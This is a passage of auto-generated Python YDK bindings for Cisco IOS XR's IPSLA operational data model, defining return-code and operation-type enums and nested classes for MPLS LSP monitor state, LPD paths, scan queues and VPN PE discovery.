ipsla_ret_code_sock_open_error = Enum.YLeaf(25, "ipsla-ret-code-sock-open-error")
ipsla_ret_code_sock_bind_error = Enum.YLeaf(26, "ipsla-ret-code-sock-bind-error")
ipsla_ret_code_sock_send_error = Enum.YLeaf(27, "ipsla-ret-code-sock-send-error")
ipsla_ret_code_sock_recv_error = Enum.YLeaf(28, "ipsla-ret-code-sock-recv-error")
ipsla_ret_code_sock_connect_error = Enum.YLeaf(29, "ipsla-ret-code-sock-connect-error")
ipsla_ret_code_sock_set_option_error = Enum.YLeaf(30, "ipsla-ret-code-sock-set-option-error")
ipsla_ret_code_sock_attach_error = Enum.YLeaf(31, "ipsla-ret-code-sock-attach-error")
ipsla_ret_code_ctrl_msg_error = Enum.YLeaf(32, "ipsla-ret-code-ctrl-msg-error")
ipsla_ret_code_no_key_chain = Enum.YLeaf(33, "ipsla-ret-code-no-key-chain")
ipsla_ret_code_key_chain_lib_fail = Enum.YLeaf(34, "ipsla-ret-code-key-chain-lib-fail")
ipsla_ret_code_no_key_id = Enum.YLeaf(35, "ipsla-ret-code-no-key-id")
ipsla_ret_code_invalid_key_id = Enum.YLeaf(36, "ipsla-ret-code-invalid-key-id")
ipsla_ret_code_entry_exist = Enum.YLeaf(37, "ipsla-ret-code-entry-exist")
ipsla_ret_code_entry_not_found = Enum.YLeaf(38, "ipsla-ret-code-entry-not-found")
ipsla_ret_code_hop_over_max = Enum.YLeaf(39, "ipsla-ret-code-hop-over-max")
ipsla_ret_code_hop_dup_address = Enum.YLeaf(40, "ipsla-ret-code-hop-dup-address")
ipsla_ret_code_vrf_name_error = Enum.YLeaf(41, "ipsla-ret-code-vrf-name-error")
ipsla_ret_code_resp_failure = Enum.YLeaf(42, "ipsla-ret-code-resp-failure")
ipsla_ret_code_auth_failure = Enum.YLeaf(43, "ipsla-ret-code-auth-failure")
ipsla_ret_code_format_failure = Enum.YLeaf(44, "ipsla-ret-code-format-failure")
ipsla_ret_code_port_in_use = Enum.YLeaf(45, "ipsla-ret-code-port-in-use")
ipsla_ret_code_no_route = Enum.YLeaf(46, "ipsla-ret-code-no-route")
ipsla_ret_code_pending = Enum.YLeaf(47, "ipsla-ret-code-pending")
ipsla_ret_code_invalid_address = Enum.YLeaf(48, "ipsla-ret-code-invalid-address")
ipsla_ret_code_max = Enum.YLeaf(49, "ipsla-ret-code-max")
class IpslaTargetTypeEnum(Enum):
"""
IpslaTargetTypeEnum (Enum Class)
IPSLA Target Types
.. data:: ipv4_address_target_type = 1
IPv4 address
.. data:: ipv4_prefix_target_type = 2
IPv4 prefix
.. data:: tunnel_id_target_type = 3
Tunnel ID
.. data:: ipv4_pseudowire_target_type = 4
IPv4 pseudowire
.. data:: ipv6_address_target_type = 5
IPv6 address
"""
ipv4_address_target_type = Enum.YLeaf(1, "ipv4-address-target-type")
ipv4_prefix_target_type = Enum.YLeaf(2, "ipv4-prefix-target-type")
tunnel_id_target_type = Enum.YLeaf(3, "tunnel-id-target-type")
ipv4_pseudowire_target_type = Enum.YLeaf(4, "ipv4-pseudowire-target-type")
ipv6_address_target_type = Enum.YLeaf(5, "ipv6-address-target-type")
class OpTypeEnum(Enum):
"""
OpTypeEnum (Enum Class)
IPSLA Operation Types
.. data:: icmp_echo = 1
icmp echo
.. data:: icmp_path_jitter = 2
icmp path jitter
.. data:: icmp_path_echo = 4
icmp path echo
.. data:: udp_jitter = 8
udp jitter
.. data:: udp_echo = 16
udp echo
.. data:: mpls_lsp_ping = 32
mpls lsp ping
.. data:: mpls_lsp_trace = 64
mpls lsp trace
.. data:: mpls_lsp_group = 128
mpls lsp group
"""
icmp_echo = Enum.YLeaf(1, "icmp-echo")
icmp_path_jitter = Enum.YLeaf(2, "icmp-path-jitter")
icmp_path_echo = Enum.YLeaf(4, "icmp-path-echo")
udp_jitter = Enum.YLeaf(8, "udp-jitter")
udp_echo = Enum.YLeaf(16, "udp-echo")
mpls_lsp_ping = Enum.YLeaf(32, "mpls-lsp-ping")
mpls_lsp_trace = Enum.YLeaf(64, "mpls-lsp-trace")
mpls_lsp_group = Enum.YLeaf(128, "mpls-lsp-group")
class SlaOpTypes(Enum):
"""
SlaOpTypes (Enum Class)
IPSLA Operation Types
.. data:: oper_icmp_echo = 1
ICMP Echo
.. data:: oper_icmp_path_jitter = 2
ICMP PathJitter
.. data:: oper_icmp_path_echo = 4
ICMP Path Echo
.. data:: oper_udp_jitter = 8
UDP Jitter
.. data:: oper_udp_echo = 16
UDP Echo
.. data:: oper_mpls_lsp_ping = 32
MPLS LSP Ping
.. data:: oper_mpls_lsp_trace = 64
MPLS LSP Trace
.. data:: oper_mpls_lsp_group = 128
MPLS LSP Group
"""
oper_icmp_echo = Enum.YLeaf(1, "oper-icmp-echo")
oper_icmp_path_jitter = Enum.YLeaf(2, "oper-icmp-path-jitter")
oper_icmp_path_echo = Enum.YLeaf(4, "oper-icmp-path-echo")
oper_udp_jitter = Enum.YLeaf(8, "oper-udp-jitter")
oper_udp_echo = Enum.YLeaf(16, "oper-udp-echo")
oper_mpls_lsp_ping = Enum.YLeaf(32, "oper-mpls-lsp-ping")
oper_mpls_lsp_trace = Enum.YLeaf(64, "oper-mpls-lsp-trace")
oper_mpls_lsp_group = Enum.YLeaf(128, "oper-mpls-lsp-group")
class Ipsla(Entity):
"""
IPSLA operational data
.. attribute:: mpls_data
MPLS operational data
**type**\: :py:class:`MplsData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData>`
.. attribute:: responder
Data from responder probe handling
**type**\: :py:class:`Responder <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.Responder>`
.. attribute:: operation_data
Operations data
**type**\: :py:class:`OperationData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData>`
.. attribute:: application_info
IPSLA application information
**type**\: :py:class:`ApplicationInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.ApplicationInfo>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla, self).__init__()
self._top_entity = None
self.yang_name = "ipsla"
self.yang_parent_name = "Cisco-IOS-XR-man-ipsla-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("mpls-data", ("mpls_data", Ipsla.MplsData)), ("responder", ("responder", Ipsla.Responder)), ("operation-data", ("operation_data", Ipsla.OperationData)), ("application-info", ("application_info", Ipsla.ApplicationInfo))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.mpls_data = Ipsla.MplsData()
self.mpls_data.parent = self
self._children_name_map["mpls_data"] = "mpls-data"
self._children_yang_names.add("mpls-data")
self.responder = Ipsla.Responder()
self.responder.parent = self
self._children_name_map["responder"] = "responder"
self._children_yang_names.add("responder")
self.operation_data = Ipsla.OperationData()
self.operation_data.parent = self
self._children_name_map["operation_data"] = "operation-data"
self._children_yang_names.add("operation-data")
self.application_info = Ipsla.ApplicationInfo()
self.application_info.parent = self
self._children_name_map["application_info"] = "application-info"
self._children_yang_names.add("application-info")
self._segment_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla"
class MplsData(Entity):
"""
MPLS operational data
.. attribute:: lsp_monitors
List of MPLS LSP Monitor instances
**type**\: :py:class:`LspMonitors <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors>`
.. attribute:: discovery
Provider Edge(PE) discovery operational data
**type**\: :py:class:`Discovery <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData, self).__init__()
self.yang_name = "mpls-data"
self.yang_parent_name = "ipsla"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("lsp-monitors", ("lsp_monitors", Ipsla.MplsData.LspMonitors)), ("discovery", ("discovery", Ipsla.MplsData.Discovery))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.lsp_monitors = Ipsla.MplsData.LspMonitors()
self.lsp_monitors.parent = self
self._children_name_map["lsp_monitors"] = "lsp-monitors"
self._children_yang_names.add("lsp-monitors")
self.discovery = Ipsla.MplsData.Discovery()
self.discovery.parent = self
self._children_name_map["discovery"] = "discovery"
self._children_yang_names.add("discovery")
self._segment_path = lambda: "mpls-data"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/%s" % self._segment_path()
class LspMonitors(Entity):
"""
List of MPLS LSP Monitor instances
.. attribute:: lsp_monitor
Operational data for MPLS LSP Monitor
**type**\: list of :py:class:`LspMonitor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors, self).__init__()
self.yang_name = "lsp-monitors"
self.yang_parent_name = "mpls-data"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("lsp-monitor", ("lsp_monitor", Ipsla.MplsData.LspMonitors.LspMonitor))])
self._leafs = OrderedDict()
self.lsp_monitor = YList(self)
self._segment_path = lambda: "lsp-monitors"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors, [], name, value)
class LspMonitor(Entity):
"""
Operational data for MPLS LSP Monitor
.. attribute:: monitor_id (key)
Monitor ID
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: state
Operational state of MPLS LSP Monitor
**type**\: :py:class:`State <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.State>`
.. attribute:: operations
List of operations in MPLS LSP Monitor
**type**\: :py:class:`Operations <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations>`
.. attribute:: scan_queues
List of Scan Queue entries in MPLS LSP Monitor
**type**\: :py:class:`ScanQueues <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors.LspMonitor, self).__init__()
self.yang_name = "lsp-monitor"
self.yang_parent_name = "lsp-monitors"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['monitor_id']
self._child_container_classes = OrderedDict([("state", ("state", Ipsla.MplsData.LspMonitors.LspMonitor.State)), ("operations", ("operations", Ipsla.MplsData.LspMonitors.LspMonitor.Operations)), ("scan-queues", ("scan_queues", Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('monitor_id', YLeaf(YType.int32, 'monitor-id')),
])
self.monitor_id = None
self.state = Ipsla.MplsData.LspMonitors.LspMonitor.State()
self.state.parent = self
self._children_name_map["state"] = "state"
self._children_yang_names.add("state")
self.operations = Ipsla.MplsData.LspMonitors.LspMonitor.Operations()
self.operations.parent = self
self._children_name_map["operations"] = "operations"
self._children_yang_names.add("operations")
self.scan_queues = Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues()
self.scan_queues.parent = self
self._children_name_map["scan_queues"] = "scan-queues"
self._children_yang_names.add("scan-queues")
self._segment_path = lambda: "lsp-monitor" + "[monitor-id='" + str(self.monitor_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/lsp-monitors/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor, ['monitor_id'], name, value)
class State(Entity):
"""
Operational state of MPLS LSP Monitor
.. attribute:: scan_remaining
Number of seconds left before next scan for addition (0xffffffff means the timer is not running)
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: delete_scan_remaining
Number of seconds left before next scan for deletion (0xffffffff means the timer is not running)
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: rediscovery_remaining
Number of seconds left before next path discovery (0xffffffff means the timer is not running)
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: lpd_compeletion_time
LPD completion time (seconds) for the entire set of PEs which are discovered in this MPLSLM instance (0xffffffff means LPD is never completed yet)
**type**\: int
**range:** 0..4294967295
**units**\: second
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors.LspMonitor.State, self).__init__()
self.yang_name = "state"
self.yang_parent_name = "lsp-monitor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('scan_remaining', YLeaf(YType.uint32, 'scan-remaining')),
('delete_scan_remaining', YLeaf(YType.uint32, 'delete-scan-remaining')),
('rediscovery_remaining', YLeaf(YType.uint32, 'rediscovery-remaining')),
('lpd_compeletion_time', YLeaf(YType.uint32, 'lpd-compeletion-time')),
])
self.scan_remaining = None
self.delete_scan_remaining = None
self.rediscovery_remaining = None
self.lpd_compeletion_time = None
self._segment_path = lambda: "state"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.State, ['scan_remaining', 'delete_scan_remaining', 'rediscovery_remaining', 'lpd_compeletion_time'], name, value)
class Operations(Entity):
"""
List of operations in MPLS LSP Monitor
.. attribute:: operation_
Operation created in MPLS LSP Monitor
**type**\: list of :py:class:`Operation <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations, self).__init__()
self.yang_name = "operations"
self.yang_parent_name = "lsp-monitor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("operation", ("operation_", Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation))])
self._leafs = OrderedDict()
self.operation_ = YList(self)
self._segment_path = lambda: "operations"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations, [], name, value)
class Operation(Entity):
"""
Operation created in MPLS LSP Monitor
.. attribute:: operation_id (key)
Operation ID
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: state
Operational state of the created operation
**type**\: :py:class:`State <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.State>`
.. attribute:: lpd_paths
List of LPD paths in MPLS LPD group operation
**type**\: :py:class:`LpdPaths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation, self).__init__()
self.yang_name = "operation"
self.yang_parent_name = "operations"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['operation_id']
self._child_container_classes = OrderedDict([("state", ("state", Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.State)), ("lpd-paths", ("lpd_paths", Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('operation_id', YLeaf(YType.int32, 'operation-id')),
])
self.operation_id = None
self.state = Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.State()
self.state.parent = self
self._children_name_map["state"] = "state"
self._children_yang_names.add("state")
self.lpd_paths = Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths()
self.lpd_paths.parent = self
self._children_name_map["lpd_paths"] = "lpd-paths"
self._children_yang_names.add("lpd-paths")
self._segment_path = lambda: "operation" + "[operation-id='" + str(self.operation_id) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation, ['operation_id'], name, value)
class State(Entity):
"""
Operational state of the created operation
.. attribute:: target_address
PE target address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: target_mask
PE target mask length
**type**\: int
**range:** 0..4294967295
.. attribute:: group_status
Latest LSP group status
**type**\: :py:class:`IpslaLspGrpStatusEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaLspGrpStatusEnum>`
.. attribute:: operation_time
Latest operation time
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.State, self).__init__()
self.yang_name = "state"
self.yang_parent_name = "operation"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('target_address', YLeaf(YType.str, 'target-address')),
('target_mask', YLeaf(YType.uint32, 'target-mask')),
('group_status', YLeaf(YType.enumeration, 'group-status')),
('operation_time', YLeaf(YType.uint64, 'operation-time')),
])
self.target_address = None
self.target_mask = None
self.group_status = None
self.operation_time = None
self._segment_path = lambda: "state"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.State, ['target_address', 'target_mask', 'group_status', 'operation_time'], name, value)
class LpdPaths(Entity):
"""
List of LPD paths in MPLS LPD group
operation
.. attribute:: lpd_path
Operational state of LPD path in MPLS LSP Group operation
**type**\: list of :py:class:`LpdPath <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths, self).__init__()
self.yang_name = "lpd-paths"
self.yang_parent_name = "operation"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("lpd-path", ("lpd_path", Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath))])
self._leafs = OrderedDict()
self.lpd_path = YList(self)
self._segment_path = lambda: "lpd-paths"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths, [], name, value)
class LpdPath(Entity):
"""
Operational state of LPD path in MPLS LSP
Group operation
.. attribute:: path_index (key)
LPD path index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: path_id
LPD path identifier
**type**\: :py:class:`PathId <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath.PathId>`
.. attribute:: path_status
Latest path status
**type**\: :py:class:`IpslaLspGrpPathStatusEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaLspGrpPathStatusEnum>`
.. attribute:: operation_time
Latest operation time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: response_time
Latest RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Number of path successes
**type**\: int
**range:** 0..4294967295
.. attribute:: failure_count
Number of path failures
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath, self).__init__()
self.yang_name = "lpd-path"
self.yang_parent_name = "lpd-paths"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['path_index']
self._child_container_classes = OrderedDict([("path-id", ("path_id", Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath.PathId))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('path_index', YLeaf(YType.int32, 'path-index')),
('path_status', YLeaf(YType.enumeration, 'path-status')),
('operation_time', YLeaf(YType.uint64, 'operation-time')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('success_count', YLeaf(YType.uint32, 'success-count')),
('failure_count', YLeaf(YType.uint32, 'failure-count')),
])
self.path_index = None
self.path_status = None
self.operation_time = None
self.response_time = None
self.success_count = None
self.failure_count = None
self.path_id = Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath.PathId()
self.path_id.parent = self
self._children_name_map["path_id"] = "path-id"
self._children_yang_names.add("path-id")
self._segment_path = lambda: "lpd-path" + "[path-index='" + str(self.path_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath, ['path_index', 'path_status', 'operation_time', 'response_time', 'success_count', 'failure_count'], name, value)
class PathId(Entity):
"""
LPD path identifier
.. attribute:: lsp_selector
LSP selector
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: output_interface
Output interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9./\-]+
.. attribute:: nexthop_address
Nexthop address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: downstream_label
Downstream label stacks
**type**\: list of int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath.PathId, self).__init__()
self.yang_name = "path-id"
self.yang_parent_name = "lpd-path"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsp_selector', YLeaf(YType.str, 'lsp-selector')),
('output_interface', YLeaf(YType.str, 'output-interface')),
('nexthop_address', YLeaf(YType.str, 'nexthop-address')),
('downstream_label', YLeafList(YType.uint32, 'downstream-label')),
])
self.lsp_selector = None
self.output_interface = None
self.nexthop_address = None
self.downstream_label = []
self._segment_path = lambda: "path-id"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.Operations.Operation.LpdPaths.LpdPath.PathId, ['lsp_selector', 'output_interface', 'nexthop_address', 'downstream_label'], name, value)
class ScanQueues(Entity):
"""
List of Scan Queue entries in MPLS LSP
Monitor
.. attribute:: scan_queue
Provider Edge(PE) addition or deletion requests in Scan Queue
**type**\: list of :py:class:`ScanQueue <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues.ScanQueue>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues, self).__init__()
self.yang_name = "scan-queues"
self.yang_parent_name = "lsp-monitor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("scan-queue", ("scan_queue", Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues.ScanQueue))])
self._leafs = OrderedDict()
self.scan_queue = YList(self)
self._segment_path = lambda: "scan-queues"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues, [], name, value)
class ScanQueue(Entity):
"""
Provider Edge(PE) addition or deletion
requests in Scan Queue
.. attribute:: address (key)
Nexthop Address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: target_address
PE target address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: target_mask
PE target mask length
**type**\: int
**range:** 0..4294967295
.. attribute:: entry
PE addition or deletion
**type**\: :py:class:`IpslaMplsAddDeleteEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaMplsAddDeleteEnum>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues.ScanQueue, self).__init__()
self.yang_name = "scan-queue"
self.yang_parent_name = "scan-queues"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['address']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('target_address', YLeaf(YType.str, 'target-address')),
('target_mask', YLeaf(YType.uint32, 'target-mask')),
('entry', YLeaf(YType.enumeration, 'entry')),
])
self.address = None
self.target_address = None
self.target_mask = None
self.entry = None
self._segment_path = lambda: "scan-queue" + "[address='" + str(self.address) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.LspMonitors.LspMonitor.ScanQueues.ScanQueue, ['address', 'target_address', 'target_mask', 'entry'], name, value)
class Discovery(Entity):
"""
Provider Edge(PE) discovery operational data
.. attribute:: vpn
L3 VPN PE discovery operational data
**type**\: :py:class:`Vpn <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.Discovery, self).__init__()
self.yang_name = "discovery"
self.yang_parent_name = "mpls-data"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("vpn", ("vpn", Ipsla.MplsData.Discovery.Vpn))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.vpn = Ipsla.MplsData.Discovery.Vpn()
self.vpn.parent = self
self._children_name_map["vpn"] = "vpn"
self._children_yang_names.add("vpn")
self._segment_path = lambda: "discovery"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/%s" % self._segment_path()
class Vpn(Entity):
"""
L3 VPN PE discovery operational data
.. attribute:: state
Operational state of PE discovery
**type**\: :py:class:`State <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.State>`
.. attribute:: nexthops
List of nexthop addresses for remote PE routers
**type**\: :py:class:`Nexthops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.Nexthops>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.Discovery.Vpn, self).__init__()
self.yang_name = "vpn"
self.yang_parent_name = "discovery"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("state", ("state", Ipsla.MplsData.Discovery.Vpn.State)), ("nexthops", ("nexthops", Ipsla.MplsData.Discovery.Vpn.Nexthops))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.state = Ipsla.MplsData.Discovery.Vpn.State()
self.state.parent = self
self._children_name_map["state"] = "state"
self._children_yang_names.add("state")
self.nexthops = Ipsla.MplsData.Discovery.Vpn.Nexthops()
self.nexthops.parent = self
self._children_name_map["nexthops"] = "nexthops"
self._children_yang_names.add("nexthops")
self._segment_path = lambda: "vpn"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/discovery/%s" % self._segment_path()
class State(Entity):
"""
Operational state of PE discovery
.. attribute:: refresh_remaining
Number of seconds left before next refresh
**type**\: int
**range:** 0..4294967295
**units**\: second
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.Discovery.Vpn.State, self).__init__()
self.yang_name = "state"
self.yang_parent_name = "vpn"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('refresh_remaining', YLeaf(YType.uint32, 'refresh-remaining')),
])
